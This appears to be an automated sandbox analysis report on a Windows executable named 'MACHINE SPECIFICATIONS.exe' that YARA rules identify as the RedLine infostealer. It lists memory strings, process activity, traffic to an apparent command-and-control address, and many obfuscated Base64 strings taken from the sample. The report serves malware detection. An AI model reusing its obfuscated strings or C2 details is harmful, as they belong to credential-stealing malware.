                        Source: tmpD3.tmp.1.dr, tmp396.tmp.1.dr, tmp6B6.tmp.1.dr, tmp5EA.tmp.1.dr, tmp51E.tmp.1.dr, tmpFF0D.tmp.1.dr, tmp452.tmp.1.dr, tmp1CE.tmp.1.dr, tmp744.tmp.1.dr, tmp8DB.tmp.1.dr, tmp7DDD.tmp.1.dr, tmp29B.tmp.1.drString found in binary or memory: https://duckduckgo.com/chrome_newtab
                        Source: tmpD3.tmp.1.dr, tmp396.tmp.1.dr, tmp6B6.tmp.1.dr, tmp5EA.tmp.1.dr, tmp51E.tmp.1.dr, tmpFF0D.tmp.1.dr, tmp452.tmp.1.dr, tmp1CE.tmp.1.dr, tmp744.tmp.1.dr, tmp8DB.tmp.1.dr, tmp7DDD.tmp.1.dr, tmp29B.tmp.1.drString found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
                        Source: MACHINE SPECIFICATIONS.exe, 00000001.00000002.366223406.0000000003742000.00000004.00000800.00020000.00000000.sdmp, MACHINE SPECIFICATIONS.exe, 00000001.00000002.366318000.00000000037CD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://get.adob
                        Source: MACHINE SPECIFICATIONS.exe, 00000001.00000002.366223406.0000000003742000.00000004.00000800.00020000.00000000.sdmp, MACHINE SPECIFICATIONS.exe, 00000001.00000002.366318000.00000000037CD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://helpx.ad
                        Source: MACHINE SPECIFICATIONS.exe, 00000000.00000002.280605622.000000000448B000.00000004.00000800.00020000.00000000.sdmp, MACHINE SPECIFICATIONS.exe, 00000000.00000002.280657393.00000000044D6000.00000004.00000800.00020000.00000000.sdmp, MACHINE SPECIFICATIONS.exe, 00000000.00000002.280558143.000000000443B000.00000004.00000800.00020000.00000000.sdmp, MACHINE SPECIFICATIONS.exe, 00000001.00000002.364558379.0000000000402000.00000040.00000400.00020000.00000000.sdmp, MACHINE SPECIFICATIONS.exe, 00000001.00000000.257898395.0000000000402000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: https://ipinfo.io/ip%appdata%
                        Source: tmpD3.tmp.1.dr, tmp396.tmp.1.dr, tmp6B6.tmp.1.dr, tmp5EA.tmp.1.dr, tmp51E.tmp.1.dr, tmpFF0D.tmp.1.dr, tmp452.tmp.1.dr, tmp1CE.tmp.1.dr, tmp744.tmp.1.dr, tmp8DB.tmp.1.dr, tmp7DDD.tmp.1.dr, tmp29B.tmp.1.drString found in binary or memory: https://search.yahoo.com/favicon.icohttps://search.yahoo.com/search
                        Source: tmpD3.tmp.1.dr, tmp396.tmp.1.dr, tmp6B6.tmp.1.dr, tmp5EA.tmp.1.dr, tmp51E.tmp.1.dr, tmpFF0D.tmp.1.dr, tmp452.tmp.1.dr, tmp1CE.tmp.1.dr, tmp744.tmp.1.dr, tmp8DB.tmp.1.dr, tmp7DDD.tmp.1.dr, tmp29B.tmp.1.drString found in binary or memory: https://search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
                        Source: MACHINE SPECIFICATIONS.exe, 00000001.00000002.366318000.00000000037CD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://support.google.com/chrome/?p=plugin_divx
                        Source: MACHINE SPECIFICATIONS.exe, 00000001.00000002.366318000.00000000037CD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://support.google.com/chrome/?p=plugin_flash
                        Source: MACHINE SPECIFICATIONS.exe, 00000001.00000002.366223406.0000000003742000.00000004.00000800.00020000.00000000.sdmp, MACHINE SPECIFICATIONS.exe, 00000001.00000002.366318000.00000000037CD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://support.google.com/chrome/?p=plugin_java
                        Source: MACHINE SPECIFICATIONS.exe, 00000001.00000002.366223406.0000000003742000.00000004.00000800.00020000.00000000.sdmp, MACHINE SPECIFICATIONS.exe, 00000001.00000002.366318000.00000000037CD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://support.google.com/chrome/?p=plugin_pdf
                        Source: MACHINE SPECIFICATIONS.exe, 00000001.00000002.366223406.0000000003742000.00000004.00000800.00020000.00000000.sdmp, MACHINE SPECIFICATIONS.exe, 00000001.00000002.366318000.00000000037CD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://support.google.com/chrome/?p=plugin_quicktime
                        Source: MACHINE SPECIFICATIONS.exe, 00000001.00000002.366223406.0000000003742000.00000004.00000800.00020000.00000000.sdmp, MACHINE SPECIFICATIONS.exe, 00000001.00000002.366318000.00000000037CD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://support.google.com/chrome/?p=plugin_real
                        Source: MACHINE SPECIFICATIONS.exe, 00000001.00000002.366318000.00000000037CD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://support.google.com/chrome/?p=plugin_shockwave
                        Source: MACHINE SPECIFICATIONS.exe, 00000001.00000002.366223406.0000000003742000.00000004.00000800.00020000.00000000.sdmp, MACHINE SPECIFICATIONS.exe, 00000001.00000002.366318000.00000000037CD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://support.google.com/chrome/?p=plugin_wmp
                        Source: MACHINE SPECIFICATIONS.exe, 00000001.00000002.366318000.00000000037CD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://support.google.com/chrome/answer/6258784
                        Source: tmpD3.tmp.1.dr, tmp396.tmp.1.dr, tmp6B6.tmp.1.dr, tmp5EA.tmp.1.dr, tmp51E.tmp.1.dr, tmpFF0D.tmp.1.dr, tmp452.tmp.1.dr, tmp1CE.tmp.1.dr, tmp744.tmp.1.dr, tmp8DB.tmp.1.dr, tmp7DDD.tmp.1.dr, tmp29B.tmp.1.drString found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
                        Source: unknownHTTP traffic detected: POST / HTTP/1.1Content-Type: text/xml; charset=utf-8SOAPAction: "http://tempuri.org/Endpoint/CheckConnect"Host: 185.222.58.90:17910Content-Length: 137Expect: 100-continueAccept-Encoding: gzip, deflateConnection: Keep-Alive
                        Source: unknownDNS traffic detected: queries for: api.ip.sb

                        System Summary

                        barindex
                        Malicious sample detected (through community Yara rule)
                        Source: 1.0.MACHINE SPECIFICATIONS.exe.400000.12.unpack, type: UNPACKEDPEMatched rule: Detects RedLine infostealer Author: ditekSHen
                        Source: 0.2.MACHINE SPECIFICATIONS.exe.448b6a8.5.unpack, type: UNPACKEDPEMatched rule: Detects RedLine infostealer Author: ditekSHen
                        Source: 0.2.MACHINE SPECIFICATIONS.exe.446b688.4.unpack, type: UNPACKEDPEMatched rule: Detects RedLine infostealer Author: ditekSHen
                        Source: 1.2.MACHINE SPECIFICATIONS.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Detects RedLine infostealer Author: ditekSHen
                        Source: 1.0.MACHINE SPECIFICATIONS.exe.400000.10.unpack, type: UNPACKEDPEMatched rule: Detects RedLine infostealer Author: ditekSHen
                        Source: 1.0.MACHINE SPECIFICATIONS.exe.400000.8.unpack, type: UNPACKEDPEMatched rule: Detects RedLine infostealer Author: ditekSHen
                        Source: 1.0.MACHINE SPECIFICATIONS.exe.400000.6.unpack, type: UNPACKEDPEMatched rule: Detects RedLine infostealer Author: ditekSHen
                        Source: 1.0.MACHINE SPECIFICATIONS.exe.400000.4.unpack, type: UNPACKEDPEMatched rule: Detects RedLine infostealer Author: ditekSHen
                        Source: 0.2.MACHINE SPECIFICATIONS.exe.446b688.4.raw.unpack, type: UNPACKEDPEMatched rule: Detects RedLine infostealer Author: ditekSHen
                        Source: 0.2.MACHINE SPECIFICATIONS.exe.44464d8.3.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables containing artifcats associated with disabling Widnows Defender Author: ditekSHen
                        Source: 0.2.MACHINE SPECIFICATIONS.exe.44464d8.3.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables embedding command execution via IExecuteCommand COM object Author: ditekSHen
                        Source: 0.2.MACHINE SPECIFICATIONS.exe.44464d8.3.raw.unpack, type: UNPACKEDPEMatched rule: Detects RedLine infostealer Author: ditekSHen
                        Source: 0.2.MACHINE SPECIFICATIONS.exe.448b6a8.5.raw.unpack, type: UNPACKEDPEMatched rule: Detects RedLine infostealer Author: ditekSHen
                        Source: 1.0.MACHINE SPECIFICATIONS.exe.400000.12.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
                        Source: 0.2.MACHINE SPECIFICATIONS.exe.448b6a8.5.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
                        Source: 0.2.MACHINE SPECIFICATIONS.exe.446b688.4.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
                        Source: 1.2.MACHINE SPECIFICATIONS.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
                        Source: 1.0.MACHINE SPECIFICATIONS.exe.400000.10.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
                        Source: 1.0.MACHINE SPECIFICATIONS.exe.400000.8.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
                        Source: 1.0.MACHINE SPECIFICATIONS.exe.400000.6.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
                        Source: 1.0.MACHINE SPECIFICATIONS.exe.400000.4.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
                        Source: 0.2.MACHINE SPECIFICATIONS.exe.446b688.4.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
                        Source: 0.2.MACHINE SPECIFICATIONS.exe.44464d8.3.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_DisableWinDefender author = ditekSHen, description = Detects executables containing artifcats associated with disabling Widnows Defender
                        Source: 0.2.MACHINE SPECIFICATIONS.exe.44464d8.3.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_RegKeyComb_IExecuteCommandCOM author = ditekSHen, description = Detects executables embedding command execution via IExecuteCommand COM object
                        Source: 0.2.MACHINE SPECIFICATIONS.exe.44464d8.3.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
                        Source: 0.2.MACHINE SPECIFICATIONS.exe.448b6a8.5.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
                        Source: C:\Users\user\Desktop\MACHINE SPECIFICATIONS.exeCode function: 0_2_00D971800_2_00D97180
                        Source: C:\Users\user\Desktop\MACHINE SPECIFICATIONS.exeCode function: 0_2_00D904980_2_00D90498
                        Source: C:\Users\user\Desktop\MACHINE SPECIFICATIONS.exeCode function: 0_2_00D995580_2_00D99558
                        Source: C:\Users\user\Desktop\MACHINE SPECIFICATIONS.exeCode function: 0_2_00D9D6680_2_00D9D668
                        Source: C:\Users\user\Desktop\MACHINE SPECIFICATIONS.exeCode function: 0_2_00D99A500_2_00D99A50
                        Source: C:\Users\user\Desktop\MACHINE SPECIFICATIONS.exeCode function: 0_2_00D95BB80_2_00D95BB8
                        Source: C:\Users\user\Desktop\MACHINE SPECIFICATIONS.exeCode function: 0_2_00D92CF00_2_00D92CF0
                        Source: C:\Users\user\Desktop\MACHINE SPECIFICATIONS.exeCode function: 0_2_00D91E280_2_00D91E28
                        Source: C:\Users\user\Desktop\MACHINE SPECIFICATIONS.exeCode function: 0_2_00D9F4700_2_00D9F470
                        Source: C:\Users\user\Desktop\MACHINE SPECIFICATIONS.exeCode function: 0_2_00D995480_2_00D99548
                        Source: C:\Users\user\Desktop\MACHINE SPECIFICATIONS.exeCode function: 0_2_00D9DB080_2_00D9DB08
                        Source: C:\Users\user\Desktop\MACHINE SPECIFICATIONS.exeCode function: 0_2_00F402B80_2_00F402B8
                        Source: C:\Users\user\Desktop\MACHINE SPECIFICATIONS.exeCode function: 0_2_00F43BA70_2_00F43BA7
                        Source: C:\Users\user\Desktop\MACHINE SPECIFICATIONS.exeCode function: 0_2_00F41C000_2_00F41C00
                        Source: C:\Users\user\Desktop\MACHINE SPECIFICATIONS.exeCode function: 0_2_00F44D700_2_00F44D70
                        Source: C:\Users\user\Desktop\MACHINE SPECIFICATIONS.exeCode function: 0_2_00F40EA80_2_00F40EA8
                        Source: C:\Users\user\Desktop\MACHINE SPECIFICATIONS.exeCode function: 0_2_00F458480_2_00F45848
                        Source: C:\Users\user\Desktop\MACHINE SPECIFICATIONS.exeCode function: 1_2_016FDE101_2_016FDE10
                        Source: C:\Users\user\Desktop\MACHINE SPECIFICATIONS.exeCode function: 1_2_016FD2F01_2_016FD2F0
                        Source: C:\Users\user\Desktop\MACHINE SPECIFICATIONS.exeCode function: 1_2_058021D81_2_058021D8
                        Source: C:\Users\user\Desktop\MACHINE SPECIFICATIONS.exeCode function: 1_2_058068F81_2_058068F8
                        Source: C:\Users\user\Desktop\MACHINE SPECIFICATIONS.exeCode function: 1_2_05801D981_2_05801D98
                        Source: C:\Users\user\Desktop\MACHINE SPECIFICATIONS.exeCode function: 1_2_0580BE801_2_0580BE80
                        Source: C:\Users\user\Desktop\MACHINE SPECIFICATIONS.exeCode function: 1_2_058026101_2_05802610
                        Source: C:\Users\user\Desktop\MACHINE SPECIFICATIONS.exeCode function: 1_2_058001901_2_05800190
                        Source: MACHINE SPECIFICATIONS.exe, 00000000.00000002.274192396.0000000002D7B000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameLDRj Axo.exe2 vs MACHINE SPECIFICATIONS.exe
                        Source: MACHINE SPECIFICATIONS.exe, 00000000.00000000.241508449.000000000108E000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenameNuGet.Frameworks.dll, vs MACHINE SPECIFICATIONS.exe
                        Source: MACHINE SPECIFICATIONS.exe, 00000000.00000002.280354476.0000000003BA1000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameZakrytyeKupla.exe< vs MACHINE SPECIFICATIONS.exe
                        Source: MACHINE SPECIFICATIONS.exe, 00000000.00000002.280605622.000000000448B000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameLDRj Axo.exe2 vs MACHINE SPECIFICATIONS.exe
                        Source: MACHINE SPECIFICATIONS.exe, 00000000.00000002.280558143.000000000443B000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameLDRj Axo.exe2 vs MACHINE SPECIFICATIONS.exe
                        Source: MACHINE SPECIFICATIONS.exe, 00000001.00000000.255245211.000000000108E000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenameNuGet.Frameworks.dll, vs MACHINE SPECIFICATIONS.exe
                        Source: MACHINE SPECIFICATIONS.exe, 00000001.00000002.364558379.0000000000402000.00000040.00000400.00020000.00000000.sdmpBinary or memory string: OriginalFilenameLDRj Axo.exe2 vs MACHINE SPECIFICATIONS.exe
                        Source: MACHINE SPECIFICATIONS.exe, 00000001.00000002.365714894.00000000033E2000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilename vs MACHINE SPECIFICATIONS.exe
                        Source: MACHINE SPECIFICATIONS.exeBinary or memory string: OriginalFilenameNuGet.Frameworks.dll, vs MACHINE SPECIFICATIONS.exe
                        Source: MACHINE SPECIFICATIONS.exeStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
                        Source: MACHINE SPECIFICATIONS.exeVirustotal: Detection: 19%
                        Source: MACHINE SPECIFICATIONS.exeReversingLabs: Detection: 14%
                        Source: MACHINE SPECIFICATIONS.exeStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
                        Source: C:\Users\user\Desktop\MACHINE SPECIFICATIONS.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                        Source: unknownProcess created: C:\Users\user\Desktop\MACHINE SPECIFICATIONS.exe "C:\Users\user\Desktop\MACHINE SPECIFICATIONS.exe"
                        Source: C:\Users\user\Desktop\MACHINE SPECIFICATIONS.exeProcess created: C:\Users\user\Desktop\MACHINE SPECIFICATIONS.exe C:\Users\user\Desktop\MACHINE SPECIFICATIONS.exe
                        Source: C:\Users\user\Desktop\MACHINE SPECIFICATIONS.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                        Source: C:\Users\user\Desktop\MACHINE SPECIFICATIONS.exeProcess created: C:\Users\user\Desktop\MACHINE SPECIFICATIONS.exe C:\Users\user\Desktop\MACHINE SPECIFICATIONS.exeJump to behavior
                        Source: C:\Users\user\Desktop\MACHINE SPECIFICATIONS.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Process Where SessionId=&apos;1&apos;
                        Source: C:\Users\user\Desktop\MACHINE SPECIFICATIONS.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                        Source: C:\Users\user\Desktop\MACHINE SPECIFICATIONS.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Process Where SessionId=&apos;1&apos;
                        Source: C:\Users\user\Desktop\MACHINE SPECIFICATIONS.exeFile created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\MACHINE SPECIFICATIONS.exe.logJump to behavior
                        Source: C:\Users\user\Desktop\MACHINE SPECIFICATIONS.exeFile created: C:\Users\user\AppData\Local\Temp\tmpA1DA.tmpJump to behavior
                        Source: classification engineClassification label: mal100.troj.spyw.expl.evad.winEXE@4/27@2/1
                        Source: MACHINE SPECIFICATIONS.exeStatic file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 49.83%
                        Source: C:\Users\user\Desktop\MACHINE SPECIFICATIONS.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dllJump to behavior
                        Source: C:\Users\user\Desktop\MACHINE SPECIFICATIONS.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dllJump to behavior
                        Source: MACHINE SPECIFICATIONS.exe, E6ou21sp/mtEC31vu.csBase64 encoded string: 'SW9hbHZ3Y2R8KW5ub2RjbnwxYXZkdGR2bHZoNzxobXoARU1XBA0GCQgACkJCXlpKUVUSXFIVVVhVVFsbFB0SH2lg'
                        Source: MACHINE SPECIFICATIONS.exe, E6ou21sp/p34sqIEC.csBase64 encoded string: 'SW9hbHZ3Y2R8KW5ub2RjbnwxYXZkdGR2bHZoNzxobXoARU1XBA0GCQgACkJCXlpKUVUSXFIVVVhVVFsbFB0SH2lg'
                        Source: MACHINE SPECIFICATIONS.exe, E6ou21sp/uHFmWqpG.csBase64 encoded string: 'SW9hbHZ3Y2R8KW5ub2RjbnwxYXZkdGR2bHZoNzxobXoARU1XBA0GCQgACkJCXlpKUVUSXFIVVVhVVFsbFB0SH2lg', 'SW9hbHZ3Y2R8KW5ub2RjbnwxYXZkdGR2bHZoNzxobXoARU1XBA0GCQgACkJCXlpKUVUSXFIVVVhVVFsbFB0SH2lg', 'SW9hbHZ3Y2R8KW5ub2RjbnwxYXZkdGR2bHZoNzxobXoARU1XBA0GCQgACkJCXlpKUVUSXFIVVVhVVFsbFB0SH2lg', 'SW9hbHZ3Y2R8KW5ub2RjbnwxYXZkdGR2bHZoNzxobXoARU1XBA0GCQgACkJCXlpKUVUSXFIVVVhVVFsbFB0SH2lg', 'SW9hbHZ3Y2R8KW5ub2RjbnwxYXZkdGR2bHZoNzxobXoARU1XBA0GCQgACkJCXlpKUVUSXFIVVVhVVFsbFB0SH2lg', 'SW9hbHZ3Y2R8KW5ub2RjbnwxYXZkdGR2bHZoNzxobXoARU1XBA0GCQgACkJCXlpKUVUSXFIVVVhVVFsbFB0SH2lg'
                        Source: MACHINE SPECIFICATIONS.exe, E6ou21sp/u0039u7HvIWG.csBase64 encoded string: 'SW9hbHZ3Y2R8KW5ub2RjbnwxYXZkdGR2bHZoNzxobXoARU1XBA0GCQgACkJCXlpKUVUSXFIVVVhVVFsbFB0SH2lg'
                        Source: MACHINE SPECIFICATIONS.exe, E6ou21sp/D5Gq3JZC.csBase64 encoded string: 'SW9hbHZ3Y2R8KW5ub2RjbnwxYXZkdGR2bHZoNzxobXoARU1XBA0GCQgACkJCXlpKUVUSXFIVVVhVVFsbFB0SH2lg'
                        Source: MACHINE SPECIFICATIONS.exe, E6ou21sp/y78voWXF.csBase64 encoded string: 'SW9hbHZ3Y2R8KVhMTi14bnxkdzNxe2Jyanx+Nzxwa2xUAUBGBBULFR0cCw=='
                        Source: MACHINE SPECIFICATIONS.exe, E6ou21sp/rKssIt3o.csBase64 encoded string: 'SW9hbHZ3Y2R8KW5ub2RjbnwxYXZkdGR2bHZoNzxobXoARU1XBA0GCQgACkJCXlpKUVUSXFIVVVhVVFsbFB0SH2lg'
                        Source: MACHINE SPECIFICATIONS.exe, E6ou21sp/omA5CsZE.csBase64 encoded string: 'SW9hbHZ3Y2R8KW5ub2RjbnwxYXZkdGR2bHZoNzxobXoARU1XBA0GCQgACkJCXlpKUVUSXFIVVVhVVFsbFB0SH2lg'
                        Source: MACHINE SPECIFICATIONS.exe, E6ou21sp/v9AX5C4E.csBase64 encoded string: 'SW9hbHZ3Y2R8KW5ub2RjbnwxYXZkdGR2bHZoNzxobXoARU1XBA0GCQgACkJCXlpKUVUSXFIVVVhVVFsbFB0SH2lg'
                        Source: MACHINE SPECIFICATIONS.exe, E6ou21sp/uA1ItnCm.csBase64 encoded string: 'SW9hbHZ3Y2R8KW5ub2RjbnwxYXZkdGR2bHZoNzxobXoARU1XBA0GCQgACkJCXlpKUVUSXFIVVVhVVFsbFB0SH2lg'
                        Source: MACHINE SPECIFICATIONS.exe, E6ou21sp/AC5KZsZF.csBase64 encoded string: 'SW9hbHZ3Y2R8KVhMTi14bnxkdzNxe2Jyanx+Nzxwa2xUAUBGBBULFR0cCw==', 'VGlnI21oZ2BtKX1iYGEubXUxYXtmfHh8fX06eWU9bHpNTlRKSkIGV0FRT0dfDVlGRFkSQERQVV5eUF9fHF5RUy8zYiU2KitnIT1tOGwvIT00NCAgeg=='
                        Source: MACHINE SPECIFICATIONS.exe, E6ou21sp/u0033Cv8rtWX.csBase64 encoded string: 'SW9hbHZ3Y2R8KW5ub2RjbnwxYXZkdGR2bHZoNzxobXoARU1XBA0GCQgACkJCXlpKUVUSXFIVVVhVVFsbFB0SH2lg'
                        Source: MACHINE SPECIFICATIONS.exe, E6ou21sp/vmpGX47v.csBase64 encoded string: 'SWxjZGElfGhnZCpmeX56L3J0MnFxYWFyfXc6Kiw9f3FEARcTFAAGBg==', 'QW1uI1dwdndne35uaC1IYGJ8c2dnaTw5cml9IDYzdG9FRhkJCkdLVxMDBExFSxUFHkFcVA8fGENRXwEREklXWSY9CBMBAmZqaAMlIiI5bh84PiY8Myc3JzAwOXsZJS46EhURQyMXCRIYFUBFBh0JVFpfGAMREgo1NSlaVlwqFxHk7vXwpMfv8+Xo+vemo+zi4O3V2tK1u7fb9vfr6c777dbEguTWxNbPwcrZi+XD2srC0trS2tLTl/7WyNbdycKV7qarpbiViIDo5Oqbo7+6rrK9t/OasKKgt6ux+5uvv6+IiIGQmM/Il4aOlr+lq6jP3dGmkpOSk5PYsJeam5jeuWltZyNCanRqaX12ISJ5Z2krOzxnfXNwa1l1djtadHJ6UwEKCQoPD1sCBwA=', 'QW1uI1dwdndne35uaC1IYGJ8c2dnaTw5cml9IDYzdG9FRhkJCkdLVxMDBExFSxUFHkFcVA8fGENRXwEREklXWSY9CBMBAmZqaAMlIiI5bh84PiY8Myc3JzAwOXsZJS46EhURQyMXCRIYFUBFBh0JVFpfGAMREgo1NSlaVlwqFxHk7vXwpMfv8+Xo+vemo+zi4O3V2tK1u7fb9vfr6c777dbEguTWxNbPwcrZi+XD2srC0trS2tLTl/7WyNbdycKV7qarpbiViIDo5Oqbo7+6rrK9t/OasKKgt6ux+5uvv6+IiIGQmM/Il4aOlr+lq6jP3dGmkpOSk5PYsJeam5jeuWltZyNCanRqaX12ISJ5Z2krOzxnfXNwa1l1djtadHJ6UwEKCQoPD1sCBwA=', 'SWxjZGEldXNpfWN4eGRtfDB4YTN1Y3d+dHh4d3k9eHBSARAXBEdWVwh7bWkMRENOV1RBE1tbWk4Z', 'Q25ubHYlYG5kfW95ZWNpL3NwfDN2cDZ2aGl2cnl5PmtPARAXBEdWVwh7bWkMRENOV1RBE1tbWk4Z', 'RXRhb21hY2ZmKWlkYGJ8L3Z4fmdxZ395fzl5enI9fHoAQFJTSExDQwhdRQseGQ5NQEESYXN3Fl5VWF1eTx1RUSw4Yw==', 'Q2ljbWpganQob2NneGh8Zn52MnB1ezZ1fTl7a2xxd3pEAVZMBBcSB0pZWgt+amwPWVxTVFFGFlhWVUMa', 'QnNrZGxxaGJ7eipqaGd7fGR8d31gNWNkcXd9O1ROUj9DTk5MVgVVV0lKTwtFXg5ORlBbX1VXWlIYX1VJHA8KHyIxMmMWAgRnISQrLCk+biA+PSty', 'Q25sd3ZkdXMoaG5heX56YnV/ZjNhZn95fzlSSFA9fXBMTlADV1VHRE0JQ1gMTFhOWV1TUVhQFlFXSxoJCB1cTzBhEAQGZS8qKS4vOGwiICMpcA==', 'U2B2dnZkcm5nZypqaGd7fGR8d31gNWNkcXd9O1ROUj9DTk5MVgVVV0lKTwtFXg5ORlBbX1VXWlIYX1VJHA8KHyIxMmMWAgRnISQrLCk+biA+PSty', 'SFJOI2JsanNte2Nlay1nfDBwZHJ9eXd1dHw6fXNvPi0UAUBTVAV0YGoJQ0ZNSktcEF5cX00U', 'SHRnI2lqYm5uYG95LGR9L3Fnc3p4dHR7fTl8dG49LCsAQ1JTBHdhZQhAR0pLSF0PX19eShU=', 'U253cWdgJndhcW9nLGthfX1wZjN9ZjZ5d206aGltbnBSVUdHBEdfB1xBTwtKREJbVUMc', 'VGlnI2JsanNteypqb25rf2RiMnx6eW83IDl7dXg9LykAQ1JTBEJURlFaSUpASA5GXVBVVkcVUFhKGUpJU15bTDMoLCRlZR8oPWk5IyM4IitwNzshJyF2NDc3LD4uKX4rCARCCgkEAQJIHQVLCx8PFgMSEx8RVQMEERcdWzkbGBrj9fGuusL05vH66erg6KA=', 'VGlnI2JsanNteypqb25rf2RiMnx6eW83IDl4a2w9eW1BWFFARUlDB0FES0xJXg5JX0MSQ0ZaVVJLSlNVWxweZi80YjAsKjMrLGksIj4+Om8zPjwlMScidywxP3s1MD84BUEWDEQCFAYRGgkKAAhOGgMYHBRUMBARHRoOCFFDOQ3h+PHg5enjqQ==', 'VGlnI2JsanNteypqb25rf2RiMnx6eW83IDl4a2w9eW1BWFFARUlDB0FES0xJXg5JX0MSQ0ZaVVJLSlNVWxweZi80YjAsKjMrLGksIj4+Om8zPjwlMScidywxP3s1MD84BUEWDEQCFAYRGgkKAAhOGgMYHBRUMBARHRoOCFFDOQ3h+PHg5enjqQ==', 'VGlnI2JsanNteypqb25rf2RiMnx6eW83IDl4a2w9eW1BWFFARUlDB0FES0xJXg5JX0MSQ0ZaVVJLSlNVWxweZi80YjAsKjMrLGksIj4+Om8zPjwlMScidywxP3s1MD84BUEWDEQCFAYRGgkKAAhOGgMYHBRUMBARHRoOCFFDOQ3h+PHg5enjqQ==', 